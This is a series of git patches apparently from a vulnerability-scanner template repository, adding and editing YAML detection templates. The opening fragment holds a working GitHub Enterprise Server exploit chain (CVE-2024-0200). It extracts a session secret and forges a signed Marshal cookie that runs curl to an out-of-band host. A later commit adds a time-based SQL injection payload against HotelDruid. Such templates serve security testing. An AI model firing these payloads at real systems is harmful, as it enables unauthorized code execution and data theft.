cpe:2.3:a:github:enterprise_server:*:*:*:*:*:*:*:* + metadata: + vendor: github + product: enterprise_server + shodan-query: title:"GitHub Enterprise" + fofa-query: app="Github-Enterprise" + verified: true + tags: cve,cve2024,rce,github,enterprise + +variables: + username: "{{username}}" + password: "{{password}}" + oast: "curl {{interactsh-url}}/?" + padstr: "{{randstr}}" + payload: '{{padding(oast,padstr,300)}}' + marshal_data: '%04%08o:@ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy%09:%0e@instanceo:%1dAqueduct::Worker::Worker%07:%0b@childI"%026%0199999999; {{payload}}%06:%06ET:%0c@loggero:%0bLogger%00:%0c@method:%0fkill_child:%09@varI"%10@kill_child%06;%09T:%10@deprecatoro:%1fActiveSupport::Deprecation%06:%0e@silencedT' + b64_marshal_data: "{{base64(url_decode(marshal_data))}}" + digest: "{{ (hmac('sha1',b64_marshal_data,ghe_secret)) }}" + final_payoad: "{{ b64_marshal_data + '--' + digest}}" + +http: + - method: GET + path: + - "{{BaseURL}}/api/v3/user/orgs" + headers: + Authorization: "Basic {{base64('{{username}}' + ':' + '{{password}}')}}" + extractors: + - type: json + part: body + name: org_name + internal: true + json: + - ".[].login" + + - method: GET + path: + - "{{BaseURL}}/api/v3/orgs/{{org_name}}/memberships/{{username}}" + headers: + Authorization: "Basic {{base64('{{username}}' + ':' + '{{password}}')}}" + matchers-condition: and + matchers: + - type: word + words: + - '"role": "admin"' + part: body + + - method: POST + path: + - "{{BaseURL}}/api/v3/orgs/{{org_name}}/repos" + headers: + Content-Type: application/json + Authorization: "Basic {{base64('{{username}}' + ':' + '{{password}}')}}" + body: | + { + "name": "{{randstr}}" + } + matchers: + - type: status + status: + - 201 + + - method: GET + cookie-reuse: true + path: + - "{{BaseURL}}/login" + extractors: + - type: regex + part: body + internal: true + group: 1 + regex: + - 'name="authenticity_token" value="(.*?)"' + name: csrf_token + + - method: POST + path: + - "{{BaseURL}}/session" + headers: + Content-Type: application/x-www-form-urlencoded + body: | + login={{username}}&password={{password}}&commit=Sign%20in&authenticity_token={{csrf_token}}& + matchers: + - type: status + status: + - 302 + - type: word + words: + - "_gh_render" + part: header + + - method: GET + path: + - "{{BaseURL}}/organizations/{{org_name}}/settings/actions/repository_items?page=1&rid_key=nw_fsck" + extractors: + - type: regex + group: 1 + name: ghe_secret + internal: true + regex: + - '"ENTERPRISE_SESSION_SECRET"=>"([^"]+?)"' + part: body + matchers: + - type: word + words: + - 'ENTERPRISE_SESSION_SECRET' + part: body + + - method: GET + path: + - "{{BaseURL}}/" + headers: + Cookie: _gh_render={{final_payoad}} + + matchers-condition: and + matchers: + - type: status + status: + - 500 + - type: word + part: interactsh_protocol + words: + - "dns" From b46189197f862347b9b48fdd84fb2e05f6a5dc9a Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 9 May 2024 16:43:00 +0530 Subject: [PATCH 028/375] Update and rename http/misconfiguration/setup-github-enterprise.yaml to http/misconfiguration/installer/setup-github-enterprise.yaml --- .../{ => installer}/setup-github-enterprise.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) rename http/misconfiguration/{ => installer}/setup-github-enterprise.yaml (93%) diff --git a/http/misconfiguration/setup-github-enterprise.yaml b/http/misconfiguration/installer/setup-github-enterprise.yaml similarity index 93% rename from http/misconfiguration/setup-github-enterprise.yaml rename to http/misconfiguration/installer/setup-github-enterprise.yaml index de6a2fd061..bddf943674 100644 --- a/http/misconfiguration/setup-github-enterprise.yaml +++ b/http/misconfiguration/installer/setup-github-enterprise.yaml @@ -8,7 +8,7 @@ info: verified: true max-request: 1 shodan-query: http.favicon.hash:-1373456171 - tags: panel,exposure,setup,github,misconfig + tags: misconfig,installer,github,setup http: - method: GET From bb538fa2adceff1b30957ba5bdb4c1dca2480248 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 9 May 2024 16:44:16 +0530 Subject: [PATCH 029/375] fix trail space --- http/cves/2024/CVE-2024-0200.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/http/cves/2024/CVE-2024-0200.yaml b/http/cves/2024/CVE-2024-0200.yaml index 231a81e3fd..d7eb5bd794 100644 --- a/http/cves/2024/CVE-2024-0200.yaml +++ b/http/cves/2024/CVE-2024-0200.yaml @@ -5,7 +5,7 @@ info: author: iamnoooob,rootxharsh,pdresearch severity: critical description: | - An unsafe reflection vulnerability was identified in GitHub Enterprise Server that could lead to reflection injection. This vulnerability could lead to the execution of user-controlled methods and remote code execution. To exploit this bug, an actor would need to be logged into an account on the GHES instance with the organization owner role. This vulnerability affected all versions of GitHub Enterprise Server prior to 3.12 and was fixed in versions 3.8.13, 3.9.8, 3.10.5, and 3.11.3. + An unsafe reflection vulnerability was identified in GitHub Enterprise Server that could lead to reflection injection. This vulnerability could lead to the execution of user-controlled methods and remote code execution. To exploit this bug, an actor would need to be logged into an account on the GHES instance with the organization owner role. This vulnerability affected all versions of GitHub Enterprise Server prior to 3.12 and was fixed in versions 3.8.13, 3.9.8, 3.10.5, and 3.11.3. reference: - https://starlabs.sg/blog/2024/04-sending-myself-github-com-environment-variables-and-ghes-shell/ - https://blog.convisoappsec.com/en/analysis-of-github-enterprise-vulnerabilities-cve-2024-0507-cve-2024-0200/ @@ -37,7 +37,7 @@ variables: marshal_data: '%04%08o:@ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy%09:%0e@instanceo:%1dAqueduct::Worker::Worker%07:%0b@childI"%026%0199999999; {{payload}}%06:%06ET:%0c@loggero:%0bLogger%00:%0c@method:%0fkill_child:%09@varI"%10@kill_child%06;%09T:%10@deprecatoro:%1fActiveSupport::Deprecation%06:%0e@silencedT' b64_marshal_data: "{{base64(url_decode(marshal_data))}}" digest: "{{ (hmac('sha1',b64_marshal_data,ghe_secret)) }}" - final_payoad: "{{ b64_marshal_data + '--' + digest}}" + final_payoad: "{{ b64_marshal_data + '--' + digest}}" http: - method: GET From e1d5472d5aefdfcf2b4fd8e61a3a7906bb9144e7 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 9 May 2024 16:47:00 +0530 Subject: [PATCH 030/375] minor update --- .../{ => fortinet}/f5-next-central-manager.yaml | 10 ++++++---- 1 file changed, 6 insertions(+), 4 deletions(-) rename http/exposed-panels/{ => fortinet}/f5-next-central-manager.yaml (82%) diff --git a/http/exposed-panels/f5-next-central-manager.yaml b/http/exposed-panels/fortinet/f5-next-central-manager.yaml similarity index 82% rename from http/exposed-panels/f5-next-central-manager.yaml rename to http/exposed-panels/fortinet/f5-next-central-manager.yaml index 9dd2622c7b..20b89da3fe 100644 --- a/http/exposed-panels/f5-next-central-manager.yaml +++ b/http/exposed-panels/fortinet/f5-next-central-manager.yaml @@ -4,7 +4,8 @@ info: name: F5 Next Central Manager Login Panel - Detect author: EgemenKochisarli severity: info - description: F5 Next Central Manager login panel was detected. + description: | + F5 Next Central Manager login panel was detected. reference: - https://clouddocs.f5.com/bigip-next/latest/use_cm/ classification: @@ -12,10 +13,11 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:h:f5:big-ip:*:*:*:*:*:*:*:* metadata: + verified: true max-request: 1 - product: bigip - vendor: big-ip_next_central_manager - tags: panel,fortinet + vendor: f5 + product: big-ip + tags: panel,fortinet,login http: - method: GET From cf6351c0b69302013cf3f1dcca3e736e662e39b9 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 9 May 2024 17:03:01 +0530 Subject: [PATCH 031/375] Create CVE-2023-43374.yaml --- http/cves/2023/CVE-2023-43374.yaml | 63 ++++++++++++++++++++++++++++++ 1 file changed, 63 insertions(+) create mode 100644 http/cves/2023/CVE-2023-43374.yaml diff --git a/http/cves/2023/CVE-2023-43374.yaml b/http/cves/2023/CVE-2023-43374.yaml new file mode 100644 index 0000000000..65b4325ac3 --- /dev/null +++ b/http/cves/2023/CVE-2023-43374.yaml @@ -0,0 +1,63 @@ +id: CVE-2023-43374 + +info: + name: Hoteldruid v3.0.5 - SQL Injection + author: ritikchaddha + severity: critical + description: | + Hoteldruid v3.0.5 was discovered to contain a SQL injection vulnerability via the id_utente_log parameter at /hoteldruid/personalizza.php. + impact: | + Successful exploitation could lead to unauthorized access to sensitive data or complete takeover of the affected system. + remediation: | + Upgrade Hoteldruid to a patched version that addresses the SQL Injection vulnerability. + reference: + - https://flashy-lemonade-192.notion.site/SQL-injection-in-hoteldruid-version-3-0-5-via-id_utente_log-parameter-8b89f014004947e7bd2ecdacf1610cf9 + - https://nvd.nist.gov/vuln/detail/CVE-2023-43374 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2023-43374 + cwe-id: CWE-89 + epss-score: 0.00076 + epss-percentile: 0.31944 + cpe: cpe:2.3:a:digitaldruid:hoteldruid:3.0.5:*:*:*:*:*:*:* + metadata: + max-request: 2 + vendor: digitaldruid + product: hoteldruid + shodan-query: title:"HotelDruid" + fofa-query: title="HotelDruid" + tags: cve,cve2023,hoteldruid,cms,sqli + +flow: http(1) && http(2) + +http: + - raw: + - | + GET /hoteldruid/inizio.php HTTP/1.1 + Host: {{Hostname}} + + host-redirects: true + max-redirects: 2 + matchers: + - type: word + part: body + words: + - "HotelDruid" + internal: true + + - raw: + - | + POST /hoteldruid/personalizza.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + aggiorna_qualcosa=SI&anno=2023&attiva_phpr_log=Enable&id_sessione=1&id_utente_log=0'%2b(SELECT%207151%20FROM%20(SELECT(SLEEP(5)))EAXh)%2b'&id_utente_mod=1 + + matchers: + - type: dsl + dsl: + - 'duration>=5' + - 'status_code == 200' + - 'contains(body, "HotelDruid:")' + condition: and From 42b368743c391719a0f2c5b2299012704c3574b6 Mon Sep 17 00:00:00 2001 From: Dominique RIGHETTO Date: Thu, 9 May 2024 19:25:18 +0200 Subject: [PATCH 032/375] Update netscaler-aaa-login.yaml --- http/exposed-panels/netscaler-aaa-login.yaml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/http/exposed-panels/netscaler-aaa-login.yaml b/http/exposed-panels/netscaler-aaa-login.yaml index 0f98f074fc..84b95058b4 100644 --- a/http/exposed-panels/netscaler-aaa-login.yaml +++ b/http/exposed-panels/netscaler-aaa-login.yaml @@ -2,7 +2,7 @@ id: netscaler-aaa-login info: name: NetScaler AAA Login Panel - Detect - author: dhiyaneshDk + author: dhiyaneshDk,righettod severity: info description: NetScaler AAA login panel was detected. reference: @@ -26,5 +26,5 @@ http: - type: word words: - "NetScaler AAA" - condition: and -# digest: 4a0a004730450221009bc41767207ec08510c28fd7db74f0a6be829e289c5817412fbf7c1a17229135022002a8cc7233b69e588e94f5ed9919a36b6964009eab52b096e3017b499ef78f6c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + - "_ctxstxt_NetscalerAAA" + condition: or From b71bf1b68351f10b0b951408446c3afd9977b263 Mon Sep 17 00:00:00 2001 From: Brandon Hutchinson Date: Thu, 9 May 2024 17:55:17 +0000 Subject: [PATCH 033/375] Create tinyproxy-detect.yaml --- http/technologies/tinyproxy-detect.yaml | 31 +++++++++++++++++++++++++ 1 file changed, 31 insertions(+) create mode 100644 http/technologies/tinyproxy-detect.yaml diff --git a/http/technologies/tinyproxy-detect.yaml b/http/technologies/tinyproxy-detect.yaml new file mode 100644 index 0000000000..6b548e1767 --- /dev/null +++ b/http/technologies/tinyproxy-detect.yaml @@ -0,0 +1,31 @@ +id: tinyproxy-detect + +info: + name: Tinyproxy detect + author: bhutch + severity: info + description: Lightweight HTTP/HTTPS proxy daemon for POSIX operating systems + reference: + - https://github.com/tinyproxy/tinyproxy + metadata: + verified: true + max-request: 1 + shodan-query: "Server: tinyproxy" + tags: tech,proxy + +http: + - method: GET + path: + - "{{BaseURL}}" + + matchers: + - type: word + part: header + words: + - "server: tinyproxy" + case-insensitive: true + + extractors: + - type: kval + kval: + - server From f2fa65385e1f348c3548842ef2358d429e5792b1 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 10 May 2024 09:50:23 +0530 Subject: [PATCH 034/375] Update cloudtrail-logs-not-encrypted.yaml --- .../cloudtrail/cloudtrail-logs-not-encrypted.yaml | 15 +++++++++++---- 1 file changed, 11 insertions(+), 4 deletions(-) diff --git a/cloud/aws/cloudtrail/cloudtrail-logs-not-encrypted.yaml b/cloud/aws/cloudtrail/cloudtrail-logs-not-encrypted.yaml index 77d0213470..4fc82d8c28 100644 --- a/cloud/aws/cloudtrail/cloudtrail-logs-not-encrypted.yaml +++ b/cloud/aws/cloudtrail/cloudtrail-logs-not-encrypted.yaml @@ -20,6 +20,7 @@ flow: | code(1) for(let CloudTrail of iterate(template.cloudtrailname)){ set("trail", CloudTrail) + set("region", CloudTrail.trailregion) code(2) } @@ -29,14 +30,20 @@ code: - sh - bash source: | - aws cloudtrail list-trails --region $region --query 'Trails[*].Name' --output json + aws cloudtrail list-trails --region $region --query 'Trails[*].[Name, HomeRegion]' --output json extractors: - type: json name: cloudtrailname internal: true json: - - '.[]' + - '.[] | .[0]' + + - type: json + name: trailregion + internal: true + json: + - '.[] | .[1]' - engine: - sh @@ -52,5 +59,5 @@ code: extractors: - type: dsl dsl: - - '"CloudTrail trail" + trail + " is not configured to encrypt log files using SSE-KMS encryption"' -# digest: 490a004630440220615ff60f92dc1540ae499c543e657c18d430e7b6b08291befb395d465b0dfa280220748efe3b2771beb250f0c50040e94c8c0a9a37f60fcb6c88bbe9ff55b5362fa1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + - '"CloudTrail trail " + trail + " is not configured to encrypt log files using SSE-KMS encryption"' +# digest: 490a004630440220615ff60f92dc1540ae499c543e657c18d430e7b6b08291befb395d465b0dfa280220748efe3b2771beb250f0c50040e94c8c0a9a37f60fcb6c88bbe9ff55b5362fa1:922c64590222798bb761d5b6d8e72950 From e3cbcc72ae1ca6e8feb8ad35e164bbad87d0d321 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Fri, 10 May 2024 12:05:20 +0530 Subject: [PATCH 035/375] Create phpmyfaq-installer.yaml --- .../installer/phpmyfaq-installer.yaml | 31 +++++++++++++++++++ 1 file changed, 31 insertions(+) create mode 100644 http/misconfiguration/installer/phpmyfaq-installer.yaml diff --git a/http/misconfiguration/installer/phpmyfaq-installer.yaml b/http/misconfiguration/installer/phpmyfaq-installer.yaml new file mode 100644 index 0000000000..c8201f32b1 --- /dev/null +++ b/http/misconfiguration/installer/phpmyfaq-installer.yaml @@ -0,0 +1,31 @@ +id: phpmyfaq-installer + +info: + name: phpMyFAQ Installation - Exposure + author: ritikchaddha + severity: high + description: phpMyFAQ installation is exposed. + metadata: + verified: true + max-request: 1 + fofa-query: "phpMyFAQ-setup" + tags: misconfig,phpmyfaq,install + +http: + - method: GET + path: + - "{{BaseURL}}/setup/index.php" + + matchers-condition: or + matchers: + - type: word + part: body + words: + - 'phpMyFAQ' + - 'Setup' + condition: and + + - type: word + part: header + words: + - 'phpmyfaq-setup' From 6e1d973c9b955088bd72909e37c6c5377a637297 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Fri, 10 May 2024 12:31:34 +0530 Subject: [PATCH 036/375] Update tinyproxy-detect.yaml --- http/technologies/tinyproxy-detect.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/http/technologies/tinyproxy-detect.yaml b/http/technologies/tinyproxy-detect.yaml index 6b548e1767..df2615fa99 100644 --- a/http/technologies/tinyproxy-detect.yaml +++ b/http/technologies/tinyproxy-detect.yaml @@ -1,7 +1,7 @@ id: tinyproxy-detect info: - name: Tinyproxy detect + name: Tinyproxy - Detect author: bhutch severity: info description: Lightweight HTTP/HTTPS proxy daemon for POSIX operating systems @@ -11,7 +11,7 @@ info: verified: true max-request: 1 shodan-query: "Server: tinyproxy" - tags: tech,proxy + tags: tech,proxy,detect http: - method: GET From 39e09a8a5bd0a552847867d5a06d0dd8cae35dae Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Fri, 10 May 2024 12:33:40 +0530 Subject: [PATCH 037/375] Update netscaler-aaa-login.yaml --- http/exposed-panels/netscaler-aaa-login.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/exposed-panels/netscaler-aaa-login.yaml b/http/exposed-panels/netscaler-aaa-login.yaml index 84b95058b4..f9a0df87fa 100644 --- a/http/exposed-panels/netscaler-aaa-login.yaml +++ b/http/exposed-panels/netscaler-aaa-login.yaml @@ -15,7 +15,7 @@ info: max-request: 1 product: netscaler vendor: citrix - tags: panel,netscaler,login,edb,citrix + tags: panel,netscaler,login,edb,citrix,detect http: - method: GET From 3aeb0e2403745efeda6e6d026ac438577daf2910 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 10 May 2024 07:18:45 +0000 Subject: [PATCH 039/375] Auto Generated Templates Checksum [Fri May 10 07:18:45 UTC 2024] :robot: --- templates-checksum.txt | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 894d39cb30..9b80322de0 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3274,7 +3274,7 @@ http/cves/2024/CVE-2024-29059.yaml:e58644b7fabb2b313e0232a6d9eaffbebb7f498a http/cves/2024/CVE-2024-29269.yaml:c36e5f4c5cebb6a3a60a4c5228dd5a823482e8cc http/cves/2024/CVE-2024-3136.yaml:5fed158063381326ca7336af0dc0c43ed317883d http/cves/2024/CVE-2024-31621.yaml:c018e5f982f789c5e23e7d94ff0f72baed228730 -http/cves/2024/CVE-2024-31848.yaml:9af993dd7348e9e7863df89ef4f77c8458ad6147 +http/cves/2024/CVE-2024-31848.yaml:0d6172ae416d3a1de4e4cabcccdb4e102f2ca440 http/cves/2024/CVE-2024-31849.yaml:38ee32ca8fe1a5378feb218852477eb6460e62ea http/cves/2024/CVE-2024-31850.yaml:e6fdbf6bb6829c0afd6fa7027b68b859f301d1ba http/cves/2024/CVE-2024-31851.yaml:75629a1e21a26e599dce39fcf8272cf24236cacf @@ -4085,7 +4085,7 @@ http/exposed-panels/netgear-version-detect.yaml:1f15ea1787f6da7ace19e6d13e2ea8d3 http/exposed-panels/netis-router.yaml:37a842ce9b050b0adf42caa1683e033cf9f3cf27 http/exposed-panels/netlify-cms.yaml:52f77df2c632a0b49af6f01e67f69347308dc73a http/exposed-panels/netris-dashboard-panel.yaml:53082539f3e6021174c2d0c07a47c947ca431659 -http/exposed-panels/netscaler-aaa-login.yaml:cb406a8b3564ac9c8ef51aefb7a59b62040fc8de +http/exposed-panels/netscaler-aaa-login.yaml:c9e869ad937515bec6f7fd19efb782be121f508e http/exposed-panels/netscaler-gateway.yaml:5c1eba07db0920fce2faf0765af99d6e835f6571 http/exposed-panels/netsparker-panel.yaml:bda43642097cc23a68a06f87ff9e42f7b5c38486 http/exposed-panels/netsus-server-login.yaml:7458b5c53ddd54f88b9140e893828568fd7f5c85 @@ -5335,7 +5335,7 @@ http/misconfiguration/haproxy-status.yaml:cd67a127bba5cbe7592fcddf3f9e4abe9ffccb http/misconfiguration/healthchecks-ui-exposure.yaml:5880a258da373e69f620756492fe363c88305114 http/misconfiguration/helm-dashboard-exposure.yaml:5d973ff4a1915a7fbbf754b9f5b3fc68146d07b9 http/misconfiguration/hfs-exposure.yaml:c274f6bce61713807f3886d7e4d3a6b58a8b5d74 -http/misconfiguration/hikivision-env.yaml:36e1e58bdcadd6cb6d52b7929a57989aa2b0d98f +http/misconfiguration/hikvision-env.yaml:a6af8cc4bdf077654c1ca5091b987c3d081e4c32 http/misconfiguration/hivequeue-agent.yaml:df621ff4d3dbb3ea3e652c99fbea133eca2d3192 http/misconfiguration/hp/unauthorized-hp-printer.yaml:960dd267c9ce3fe43452ea0d5e30fdb4cc1430be http/misconfiguration/hp/unauthorized-printer-hp.yaml:69f3ee3a5ae28923c962d7e2b23a0deb5e824611 @@ -7448,7 +7448,7 @@ http/vulnerabilities/cisco/cisco-unified-communications-log4j.yaml:603bb5279bc4d http/vulnerabilities/cisco/cisco-vmanage-log4j.yaml:ea1ab53653cf1c170515c6ee5e6867b76f167b01 http/vulnerabilities/cisco/cisco-webex-log4j-rce.yaml:aef89b607f0527340246a54d607fb5a0c4533d5e http/vulnerabilities/cisco/cucm-username-enumeration.yaml:8f1f34c21c46c88b1faf80e11363097dc18d7c03 -http/vulnerabilities/citrix/citrix-oob-memory-read.yaml:b31d091364cfce9c3384b7db96cf236992d044f4 +http/vulnerabilities/citrix/citrix-oob-memory-read.yaml:7866f3668d1f681eff787a1c2b9146a491251e11 http/vulnerabilities/code42/code42-log4j-rce.yaml:c6eca1ad5491f3ab51671acd9067242f3f77767e http/vulnerabilities/concrete/concrete-xss.yaml:85b12fb54e5f98736f4bc70df764384fe675f2f2 http/vulnerabilities/confluence/confluence-ssrf-sharelinks.yaml:305c4b65dec3bc65e31fcd5c0b72a9841e630064 @@ -8498,7 +8498,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:435e6048b63deb8509219645aafa7043cc65537c +templates-checksum.txt:4a1a4fcc08b86952211e59430aeefda29f66c75e wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 3fe45cfd32ee539b15f38948f9cefb431238b068 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 10 May 2024 07:20:29 +0000 Subject: [PATCH 040/375] Auto Template Signing [Fri May 10 07:20:29 UTC 2024] :robot: --- http/exposed-panels/netscaler-aaa-login.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/exposed-panels/netscaler-aaa-login.yaml b/http/exposed-panels/netscaler-aaa-login.yaml index f9a0df87fa..7d995d74b9 100644 --- a/http/exposed-panels/netscaler-aaa-login.yaml +++ b/http/exposed-panels/netscaler-aaa-login.yaml @@ -28,3 +28,4 @@ http: - "NetScaler AAA" - "_ctxstxt_NetscalerAAA" condition: or +# digest: 4b0a00483046022100fc8390a0699abae759299064c59fc5ac4a3e0fda101ec74ba62d8362437ea339022100a02a6c73d54ef2e5655e15c3526ff0d9e2c91abbc96e47cf045c71e19c51618a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From d6fec33ee9a830fe0ad013bcb2a4b5de400ec7ee Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Fri, 10 May 2024 13:56:12 +0530 Subject: [PATCH 042/375] updated matchers --- unigui-server-monitor-exposure.yaml | 37 +++++++++++++++-------------- 1 file changed, 19 insertions(+), 18 deletions(-) diff --git a/unigui-server-monitor-exposure.yaml b/unigui-server-monitor-exposure.yaml index bd43afad2f..922ef2f2aa 100644 --- a/unigui-server-monitor-exposure.yaml +++ b/unigui-server-monitor-exposure.yaml @@ -1,34 +1,35 @@ id: unigui-server-monitor-exposure info: - name: UniGUI Server Monitor Panel Exposure + name: UniGUI Server Monitor Panel - Exposure author: serrapa - severity: medium - description: Detects exposed UniGUI Server Monitor Panels which could reveal sensitive server statistics, users sessions, licensing information and others data. + severity: low + description: | + Detects exposed UniGUI Server Monitor Panels which could reveal sensitive server statistics, users sessions, licensing information and others data. reference: - https://www.unigui.com/doc/online_help/using-server-monitor-(server-c.htm - tags: exposure,unigui + metadata: + verified: true + max-request: 1 + shodan-query: title:"uniGUI" + fofa-query: title="uniGUI" + tags: exposure,unigui,misconfig -requests: +http: - method: GET path: - "{{BaseURL}}/server" matchers-condition: and matchers: - - type: word - words: - - "uniGUI Standalone Server" - - "uniGUI License Information" - - "Server Statistics" - part: body - - - type: status - status: - - 200 + - type: dsl + dsl: + - 'contains_any(body, "uniGUI Standalone Server", "uniGUI License Information", "Server Statistics")' + - 'status_code == 200' + condition: and - type: dsl dsl: - - "contains(body, 'layout:\"fit\",title:\"uniGUI Standalone Server\"')" - - "contains(body, 'layout:\"absolute\",title:\"Server Statistics\"')" - + - 'contains(body, "layout:\"fit\",title:\"uniGUI Standalone Server\"")' + - 'contains(body, "layout:\"absolute\",title:\"Server Statistics\"")' + condition: or From 05ab08866593b642a51b268e7fa9f6462c86dc5e Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 10 May 2024 08:26:15 +0000 Subject: [PATCH 043/375] Auto Generated Templates Checksum [Fri May 10 08:26:15 UTC 2024] :robot: --- templates-checksum.txt | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 9b80322de0..1dc13e232b 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -4085,7 +4085,7 @@ http/exposed-panels/netgear-version-detect.yaml:1f15ea1787f6da7ace19e6d13e2ea8d3 http/exposed-panels/netis-router.yaml:37a842ce9b050b0adf42caa1683e033cf9f3cf27 http/exposed-panels/netlify-cms.yaml:52f77df2c632a0b49af6f01e67f69347308dc73a http/exposed-panels/netris-dashboard-panel.yaml:53082539f3e6021174c2d0c07a47c947ca431659 -http/exposed-panels/netscaler-aaa-login.yaml:c9e869ad937515bec6f7fd19efb782be121f508e +http/exposed-panels/netscaler-aaa-login.yaml:54b265bd78107b40ff7b88241e4f5b4e3ec2b6c5 http/exposed-panels/netscaler-gateway.yaml:5c1eba07db0920fce2faf0765af99d6e835f6571 http/exposed-panels/netsparker-panel.yaml:bda43642097cc23a68a06f87ff9e42f7b5c38486 http/exposed-panels/netsus-server-login.yaml:7458b5c53ddd54f88b9140e893828568fd7f5c85 @@ -8395,7 +8395,7 @@ network/detection/totemomail-smtp-detect.yaml:fef66d409db7afc6efd33ddcae751cd3a7 network/detection/vmware-authentication-daemon-detect.yaml:fe32f8021fd370465c0f97fff15ea59eb34e42fd network/detection/vnc-service-detect.yaml:22f648aa53fa7fb08f258bcd06fa4b15d80eebca network/detection/weblogic-iiop-detect.yaml:05bf3f6fdfa938cfb88ee0e5f27da5e1b8d70bfa -network/detection/weblogic-t3-detect.yaml:06f88de334b8bae8279d944c0cf4467919930e93 +network/detection/weblogic-t3-detect.yaml:d3dc1f10137723bfd082bce409d2bf11ab1cbcc5 network/detection/wing-ftp-detect.yaml:79fe3254d4657278f122977cda7145287f7b993c network/detection/ws_ftp-ssh-detect.yaml:558ac2fd876a7239ddfd7c5c9433769f166644bd network/detection/xlight-ftp-service-detect.yaml:c1bcbafb4cd2ad7a5b4b6c7b947779ee08367781 @@ -8498,7 +8498,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:4a1a4fcc08b86952211e59430aeefda29f66c75e +templates-checksum.txt:7fe510f2b3d443f5dfc758fdda968aa2cd19f6f2 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 4e789d37e9c9364fea197e3a090fbb100fc4f87a Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 10 May 2024 08:27:55 +0000 Subject: [PATCH 044/375] Auto Template Signing [Fri May 10 08:27:55 UTC 2024] :robot: --- network/detection/weblogic-t3-detect.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/network/detection/weblogic-t3-detect.yaml b/network/detection/weblogic-t3-detect.yaml index b1035ceb2a..918e7fe59f 100644 --- a/network/detection/weblogic-t3-detect.yaml +++ b/network/detection/weblogic-t3-detect.yaml @@ -50,3 +50,4 @@ tcp: group: 1 regex: - "HELO:(.*).false" +# digest: 4a0a00473045022100facd45545006bc9f15dfbf5927e636142e1983912edf41f16247c32732bde2570220480584b7a2efa59dd5d643adefc5cb750e10c155f054ca2bcde4de68a97cbd64:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 626141000220a244be1eb4fd713767b8b88f1cad Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Fri, 10 May 2024 14:17:49 +0530 Subject: [PATCH 045/375] fixed false-negatives --- http/exposed-panels/umami-panel.yaml | 21 +++++++++++++-------- 1 file changed, 13 insertions(+), 8 deletions(-) diff --git a/http/exposed-panels/umami-panel.yaml b/http/exposed-panels/umami-panel.yaml index e20ed8e61d..d26a8a8a86 100644 --- a/http/exposed-panels/umami-panel.yaml +++ b/http/exposed-panels/umami-panel.yaml @@ -1,27 +1,32 @@ id: umami-panel info: - name: Umami Panel + name: Umami Panel - Detect author: userdehghani severity: info metadata: + verified: true max-request: 1 shodan-query: http.favicon.hash:-130447705 - verified: true - tags: panel,umami,login + tags: panel,umami,login,detect http: - method: GET path: - "{{BaseURL}}/login" + - 